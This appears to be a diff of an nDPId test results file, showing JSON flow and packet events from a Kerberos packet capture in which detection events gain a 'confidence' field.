 00817{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1549337929790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":332,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":332,"pkt_l4_len":298,"ts_msec":1549337929790,"pkt":"AAgCHEeupB9ywglqCABFAAE+ExRAAIAGfbSsEAgIrBAIyQBYwAVvOdOesp21NlAYAQCkkQAAAAABEn6CAQ4wggEKoAMCAQWhAwIBHqQRGA8yMDE5MDIwNTAzMzg0OFqlBQIDBjUgpgMCARmpEBsOaGFwcHljcmFmdC5vcmeqIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDmhhcHB5Y3JhZnQub3JnrIGnBIGkMIGhMH6hAwIBE6J3BHUwczA0oAMCARKhLRsrSEFQUFlDUkFGVC5PUkdob3N0am9obnNvbi1wYy5oYXBweWNyYWZ0Lm9yZzAFoAMCARcwNKADAgEDoS0bK0hBUFBZQ1JBRlQuT1JHaG9zdGpvaG5zb24tcGMuaGFwcHljcmFmdC5vcmcwCaEDAgECogIEADAJoQMCARCiAgQAMAmhAwIBD6ICBAA="}
+00722{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"ts_msec":1549337929790,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929811,"flow_last_seen":1549337929811,"flow_idle_time":7440000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"ts_msec":1549337929811,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49158,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00875{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1549337929811,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"ts_msec":1549337929811,"pkt":"pB9ywglqAAgCHEeuCABFAAFnABtAAIAGkISsEAjJrBAICMAGAFganBtaQ2U1slAYAQDaGgAAAAABO2qCATcwggEzoQMCAQWiAwIBCqNjMGEwTKEDAgECokUEQzBBoAMCARKiOgQ4YERcga5zFfjuo7+oqo0hJ6Udj7efOwOKKYJj6PKpxuETgzDcdt27IvGW9sEQ18QPUV\/drVuLVBwwEaEEAgIAgKIJBAcwBaADAQH\/pIHBMIG+oAcDBQBAgQAQoRgwFqADAgEBoQ8wDRsLam9obnNvbi1wYySiEBsOaGFwcHljcmFmdC5vcmejIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDmhhcHB5Y3JhZnQub3JnpREYDzIwMzcwOTEzMDI0ODA1WqYRGA8yMDM3MDkxMzAyNDgwNVqnBgIETsAWF6gVMBMCARICARECARcCARgCAv95AgEDqR0wGzAZoAMCARShEgQQSk9ITlNPTi1QQyAgICAgIA=="}
-00688{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929811,"flow_last_seen":1549337929811,"flow_idle_time":7440000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"ts_msec":1549337929811,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49158,"dst_port":88,"l4_proto":"tcp","ndpi": {"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
+00714{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929811,"flow_last_seen":1549337929811,"flow_idle_time":7440000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"ts_msec":1549337929811,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49158,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
 00603{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1549337929812,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"ts_msec":1549337929812,"pkt":"AAgCHEeupB9ywglqCABFAACYExlAAIAGflWsEAgIrBAIyQBYwAZDZTtmGpwcmVAYAQDnsgAAX5hri3Z\/opje40K53kwDKo2\/CTegm0pJkWpLVNFlnn\/MakUFXqKHv4CDtH2CbQqvJq\/ecJgxH2EwrzVmUcQk2zqXXjIwbkyszZ9\/Xc6IEgQ4qiI64lPzINS7ueVTbdUXk\/8v52QxoGdMilBjjWTAcQ=="}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929815,"flow_last_seen":1549337929815,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1549337929815,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49159,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1549337929815,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"ts_msec":1549337929815,"pkt":"pB9ywglqAAgCHEeuCABFAACxACFAAIAGkTSsEAjJrBAICMAHAFgBsoC8gS4auFAYAQDUqQAAiNeE+tCJIo9Cz1KFHGicigIlxkFIEVkb70vifDKvvi6NwB24GlkehWdocuUvESpeAqtSofWtuKDm2yskVOheE+r4DxaQxRLncJy9zYBP+p7ofQvBukmarkg+oY3ctA8jgj5BSy2yi42NlxJjhcjuX3ByLG+GD20zq41Le0TbPh0TFS5qkRb0Q24="}
 00604{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1549337929815,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":169,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":169,"pkt_l4_len":135,"ts_msec":1549337929815,"pkt":"AAgCHEeupB9ywglqCABFAACbEx9AAIAGfkysEAgIrBAIyQBYwAeBLiBsAbKBRVAYAQBP\/wAA1H56bb56rLTzhI\/so6pGl6jILu03bHY2ZWl4A41JY07Kavo1sQRKhlNPx3vE\/LdSF6BX6NLW1Fm3Tdmvr7ZEbPWOq8FZs9c0RBY7wJbwPUW44FlC0vhqJn1yGB3K1Fxl0gPqAAMzMrhupJQMQzjV4fgdag=="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"ts_msec":1549337929816,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 02380{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1549337929816,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1485,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1485,"pkt_l4_len":1451,"ts_msec":1549337929816,"pkt":"pB9ywglqAAgCHEeuCABFAAW\/ACZAAIAGjCGsEAjJrBAICMAIAFgkzleN\/pyBM1AYAQCd1QAAAAAFk2yCBY8wggWLoQMCAQWiAwIBDKOCBRcwggUTMIIE\/6EDAgEBooIE9gSCBPJuggTuMIIE6qADAgEFoQMCAQ6iBwMFAAAAAACjggQ0YYIEMDCCBCygAwIBBaEQGw5IQVBQWUNSQUZULk9SR6IjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkejggPsMIID6KADAgESoQMCAQKiggPaBIID1l4LwpNuTjPo\/WSca61wgawIInNQ2vTGqwCxtV1QigPfApKXxUIq16oPsvd5TUFFBoZ3psSaal0IeVBLFx\/BX1XOMXvlpVRB9MsTpZwTQ9ax1GLB6I2i5bbUZpknsnBAKrSXL695P06nXI2pxBPckcoFwJAlSBEmG2XByE8IS7rO1EarXMbJ6Y6aTY3qAJfaaRab4vHhRG2Vuf+5JWuR5w1NLPXeeoD\/rArSk0gCVLkR21SKfZcS\/vqPldqO0np7TLmMBVoYjsl6PiI0+4z2cMBft\/qbxRIxb8y1vWhjoJ64ue7lCoT2cvFOdVWD\/WH\/fANzw0ML9F0vLIXCgI1qi1sWcerxATeYpOyo7DWpsJioH9jxAPx+B6RM+9U5zQIKM9BdT3C3olrkQMfOua6FPtyqIt9kVcakdowBTS4+NidzK5sGlYIRntlAxGR8YU5brzwGdboEMfsAHK11qtTE6t\/tDmgr1+cFgW34p7q9yjtfw3IlMfNtNF6cVYmOh6G5Wnxcfjqbsrpj7Kw6mjBwfKtaYNJG6XthlVKo9I4FpdysFIteChs2N+mQtafp0AWZxKjjDKO8sohbJklYhyoJOto52hds26FAU4LmrIc5fMmADp1PG\/tBDi0BnZ3SimtoeWyM2fnwWhBrH67Gc6TeKPHSeyVFwR1fSnMxZTlzS7KXwLa62U6BZ0WNCBZzIdUTje6\/aUFTq4XeeR0Z7Vh6Z9DZ9om\/9wiQsBPMMalPRPnqfmOZT7HV5yr74UqmbVg1OWh8En3RVYoEzl+U9UxwXXFIR5zUwJrSv4BRCrfouK2f87lMtCFEg\/zEl+Ya6jB+A9XZfPbLOpJ+x1ZsBKiE7MFw9X4cPsiIvoIaHcwmirVOaa9JrhuL72qg0GrV2LWFm+xJt5NjWGhgRHFok1jp2URmHs7J3zvdeb+nbPHLvYUdtkqwb3aoYEr1Xmflw8UpDr6MDbT2en\/\/11z39903bvFGohUv62WN4swCRiY9JjXJUs610D4Xxus5+CL0zgzTQQAxEvC4LL9CQELhrXgdhbQmsotNytXnsgYuKhF4RMS5q5UH8sx1AGsmSntAJ\/W4iO+\/MbV3oU5HdPpcERFm3hfRy\/GBSS75vadxxOcRHZA6iF9\/pQ9BlFHhHcWkaQuZyUL6qH1sbSQyui0sXjtHojjpnPlsTpEM9hpMt6LhooASI6ATNe\/Xw7kB+HTJthDR\/bJnXbftcEdtnk7dLQYL5MfhSH8BDyuI9MMLmdpozP+V7mPT5HhUnsqRSQWCVyfiuDhL0shZpk83f0xNTTmK8fhSYF8Q1BGkgZwwgZmgAwIBEqKBkQSBjpT6WKZ4R5UUi5WTtSgEkEd7jMLa6AoUPu4TwrcLKGcmB9vngXIzOhZvqCgHdzOkHetRjgLUyTIXem1PFxz6mY8TxQcIZDyb19SN3Nd3sKaxs2IYEv7YHwXG6E8LM8hJLH2m\/TyiwnWxB70uZ574gAkF4FD1Zq+qMVWQ8VxsOQkGL92ElZ2TaAS4GGYCEnUwDqEEAgIApaIGBAQfAAAApGQwYqAHAwUAYIEAEKIQGw5IQVBQWUNSQUZULk9SR6MjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkelERgPMjAzNzA5MTMwMjQ4MDVapwYCBE7NBe6oBTADAgES"}
-00682{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"ts_msec":1549337929816,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","ndpi": {"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":""}}
+00708{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"ts_msec":1549337929816,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":""}}
 02405{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1549337929816,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1498,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1498,"pkt_l4_len":1464,"ts_msec":1549337929816,"pkt":"AAgCHEeupB9ywglqCABFAAXMEyNAAIAGeResEAgIrBAIyQBYwAj+nIEzJM5dJFAYAQC28wAAAAAFoG2CBZwwggWYoAMCAQWhAwIBDaMQGw5IQVBQWUNSQUZULk9SR6QYMBagAwIBAaEPMA0bC0pPSE5TT04tUEMkpYIENGGCBDAwggQsoAMCAQWhEBsOSEFQUFlDUkFGVC5PUkeiIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHo4ID7DCCA+igAwIBEqEDAgECooID2gSCA9ZmgNa1dr3wGd87q5o3XWLsTIWysbTgkwJr+Tn54CyV4AH6vlEgusASRdJcyvN0onPWOO9TStPkihUEobLQ8WG5\/BAe\/pJm76NJeRjK9kGGi8G\/0XbFCYSPepa5PQwmUgAjsgxX98uOoIoeMgpxrDD2I4YnqT0o9T7E4u8XbTiIf+v3cdcN4dCZ+EoTKAM9GSdtpSP62\/Xb+2PxUXMWzXRKdBV4GPRc7M\/f3KRdK529+2pM4yLgF6mfdzw1YttOYiTQBSOIseZU5L5pWWwIAYUeadQLWeGW7MCmuOiezPfzHOKXT\/hMqEB\/2Egds2KA7Hm\/oP01r9IU6p42tCtn+I4EWSm5ZkiMAIXP6SCiOdO2PbdtR\/4GK9kZARZpgtLJG+aGmFpRzNAdcgcLMHN2OlX0J6+piruBM7Ww3kqLpZgruCuGx8K+d\/8FApmAeWnLmXbD3fu1T00fGd6fdKrkgCl98Sy4I0iKgJr019SubVPh\/tLfXvOPHFTskrZiab\/lkJMa\/lcaCHUWtHfBuxSsNJt7gody42oqvvYHikEn7VlQJDi\/u8KzU07HljjjoqhCYV678B3YcCsVdGefRzEoUzSdH\/BYJGW+CkosfzR7MiRBWyvn77tCF67oxZ3T5EhVst6OUOt05ejCBeF0j2P8Sa6RL1vPg6TCt7KX5yXzGdJtuRQYFzwHms4Ux+JYQXrmLh2ixoc55gWooUap7xcPOrj9EtgR7efu2PqGQVuytvq6rdV+3QUFA8AufxbPXK507+RBmLMcLcxZAxOp7SQc\/Ay3c\/ORhr+fWLV6VFfX75zufwBySCOGvrbuFXK0SnMVFwylor3lGY2Czl7Y5QKDcK4+FS+SJKTqaxj0EFxa2D+DbGLwbVt3zt9+tPhI+pr7vL0LtIL0O055Y3MLTTiVoB4FnEuGzQivRnPbXzFFcdCIUDcAh26XtB4LCpmd+fBTcLafa5ZKQ2nsR\/2LH7kpZxim50Hcvtyd5PzGPwKSVk2Q+psnZ0IehfsbwhALTs\/RQSOb7Rq41AGgy7OAH5YvpBKSd7qUDfb1gtLh6EIYhMprEuGvAg42lOnEYktaA8Y0X4PyM72xSTA9ZN+CxfcvwiIlvHf11TL5C5ZRBUy3du\/RJjPcfxsjqIdqVfXMDys4DGOvXOODvANQyMdpD2WSRWTBduQ+1useq7xNugt3rmAScfUohAT\/giN4TexFk96WUfGs376rRqExitzbuece0s6lptdaN+3sKDC1NFILlW4MQPBHpc3ComgefM9jAmeqLxMUur1iJW82d2i1F5BNiRpTZEFf7MD9poIBJjCCASKgAwIBEqKCARkEggEVQDvO7+WVQbXswJT\/WKenjoLOTOUb7xtnQSDSvTALA7cFBjKmG7py2Ll3YHsUrZQaKL2ZgS2bNcKYx\/3+lfvv+kAlvcN39ExBH9j9AGm8H1cRnFwNhRWCETnioXg\/P1Y2p+e3F0h6bOneEdLiePwHJv9FonrRV61HKyJDpzH6E0h5BR7t2eo\/60DJORIRuiguwoofBgNuIj9IIWatzAufVetcbqrWIpOgXa8Tl5itQ\/bI2zF6hwUS3TRThkmm+Lz7J7LBceoySEetzaEsRZtQYN6tENYmlD5+VEJvmJ\/Gk593lHeRAE07ZMXwY1fmEib\/vL\/sBgCUMH7CIYMAL4GjstMrJCbIeZhyoYmoahgOuedSq46aMw=="}
-00700{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"ts_msec":1549337929816,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","ndpi": {"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
+00726{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"ts_msec":1549337929816,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929817,"flow_last_seen":1549337929817,"flow_idle_time":7440000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"ts_msec":1549337929817,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49156,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00753{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1549337929817,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"ts_msec":1549337929817,"pkt":"pB9ywglqAAgCHEeuCABFAAELACpAAIAGkNGsEAjJrBAICMAEAb1XsKRSOc8tT1AYAP5XOQAAtEaCpoUNMQEcRu8rXL+flRkpXPhHudnte7juaoAeTLu\/yTOr\/klMHDKYHSz0JIIsigIVsBaMl3PyJLoeb\/thjoYGSwkEC2m4nRdpRXAof0BuI3WnXPinh7MhPVCaTGyJNfqfVu\/1dc4+HXKYy76MWWV4zUtzQAeAZlVdIbuoLUlvFXjFSw5Ryb7lDA5ay5XLMnQY1U2bYUt6MYxBsLvHXZpUwBGPjxstpVTddlgnyYV1MOsJQv5Du0utIGTzTo6LpQrGUrUbi+j64I7Cmr+KeRuwdhEzhGbc+mJlwRYjD6cvIxA="}
 00801{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1549337929818,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":314,"pkt_l4_len":280,"ts_msec":1549337929818,"pkt":"AAgCHEeupB9ywglqCABFAAEsEydAAIAGfbOsEAgIrBAIyQG9wAQ5zy1PV7ClNVAYAQBD3AAAAAABAP5TTUJAAAEAAAAAAAEAHwAJAAAAAAAAAAIAAAAAAAAA\/\/4AAAAAAABZAAAAAAQAAM9KX1xrFqd60K9wkt\/rc1cJAAAASAC4AKGBtTCBsqADCgEAoQsGCSqGSIL3EgECAqKBnQSBmmCBlwYJKoZIhvcSAQICAgBvgYcwgYSgAwIBBaEDAgEPongwdqADAgESom8EbaDd4i7\/ItyR1a9jC52avEiTOhersM4IXB2s8eeK3O+ftonNzS3toSakh8sE2tBVm3gbqMBKq1zSZzBBR6cu+Hrjxp\/3xoJEFPVC\/4y\/BWmosce7zt2RHazTIcgt7F0qD+5oY0gWkTgMB+VU0Ro="}
@@ -26,11 +27,12 @@
 00729{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1549337929983,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"ts_msec":1549337929983,"pkt":"AAgCHEeupB9ywglqCABFAAD6EzZAAIAGfdasEAgIrBAIyQGFwAlIl8v7DkIzcVAYAQBePQAAMIQAAADMAgEDYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG1fPlG7bKWdrh2HD6cpz+MijBmfhDcDSHRgxosMnwcbCi1ZRnrViGBtMC2nQv6mVUDSJapX\/mZgtc4l9ALb+\/jokxskSCIt0GZfBXlBh6SOp7g9nc\/2WT4mG5e+fctttNW4KixsBWTLsk4U0TsD"}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930192,"flow_last_seen":1549337930192,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"ts_msec":1549337930192,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1549337930192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"ts_msec":1549337930192,"pkt":"pB9ywglqAAgCHEeuCABFAAEXAE9AAIAGkKCsEAjJrBAICMAOAFh1zEKiBQpS4FAYAQB22wAAAAAA62qB6DCB5aEDAgEFogMCAQqjFTATMBGhBAICAICiCQQHMAWgAwEB\/6SBwTCBvqAHAwUAQIEAEKEYMBagAwIBAaEPMA0bC2pvaG5zb24tcGMkohAbDkhBUFBZQ1JBRlQuT1JHoyMwIaADAgECoRowGBsGa3JidGd0Gw5IQVBQWUNSQUZULk9SR6URGA8yMDM3MDkxMzAyNDgwNVqmERgPMjAzNzA5MTMwMjQ4MDVapwYCBE6HHTSoFTATAgESAgERAgEXAgEYAgL\/eQIBA6kdMBswGaADAgEUoRIEEEpPSE5TT04tUEMgICAgICA="}
-00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930192,"flow_last_seen":1549337930192,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"ts_msec":1549337930192,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","ndpi": {"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
+00715{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930192,"flow_last_seen":1549337930192,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"ts_msec":1549337930192,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}}
 00818{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1549337930193,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":332,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":332,"pkt_l4_len":298,"ts_msec":1549337930193,"pkt":"AAgCHEeupB9ywglqCABFAAE+E0ZAAIAGfYKsEAgIrBAIyQBYwA4FClLgdcxDkVAYAQCvKAAAAAABEn6CAQ4wggEKoAMCAQWhAwIBHqQRGA8yMDE5MDIwNTAzMzg0OFqlBQIDDGWApgMCARmpEBsOSEFQUFlDUkFGVC5PUkeqIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHrIGnBIGkMIGhMH6hAwIBE6J3BHUwczA0oAMCARKhLRsrSEFQUFlDUkFGVC5PUkdob3N0am9obnNvbi1wYy5oYXBweWNyYWZ0Lm9yZzAFoAMCARcwNKADAgEDoS0bK0hBUFBZQ1JBRlQuT1JHaG9zdGpvaG5zb24tcGMuaGFwcHljcmFmdC5vcmcwCaEDAgECogIEADAJoQMCARCiAgQAMAmhAwIBD6ICBAA="}
